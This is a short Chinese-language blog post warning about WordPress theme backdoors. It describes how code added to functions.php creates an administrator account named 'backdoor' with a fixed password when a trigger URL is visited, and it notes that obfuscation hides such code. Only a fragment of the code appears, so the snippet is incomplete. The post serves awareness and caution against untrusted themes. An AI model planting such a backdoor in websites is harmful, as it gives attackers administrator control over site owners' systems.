是不是在很多場合聽説過後門(Backdoor),特別是一些高科技的電影裏面,那些系統或者程式的作者都會通過自己留下的後門來拯救世界。其實 程式的後門留我們根本不遠,其實你用的很多站羣軟件或者程式都是有後門的,下面給大家演示的一個很簡單的案例,就可以給 WordPress 站點留下後門,獲取管理員許可權,當然這只是一篇教學文章,個人強烈你在使用 WordPress 幫人作網站的時候,千萬不要這樣做。
set_role( ‘administrator’ );
}
}
}
比如在主題的 functions.php 檔案中新增以上程式碼,就可以給 WordPress 新增一個能夠建立管理員的後門,只需訪問 http://www.yoursitename.com/?backdoor=go,然後就建立了一個使用者名稱為 “backdoor”,密碼 為:“pa55w0rd!” 的管理員。
如果在把上面這段程式碼加密一下,很多使用者就根本不知道這段程式碼是做什麼的,所以強烈建議大家不要隨便去下載一些來路不明的 WordPress 主題和插件外掛,説不定就給你的站點安裝了一個後門
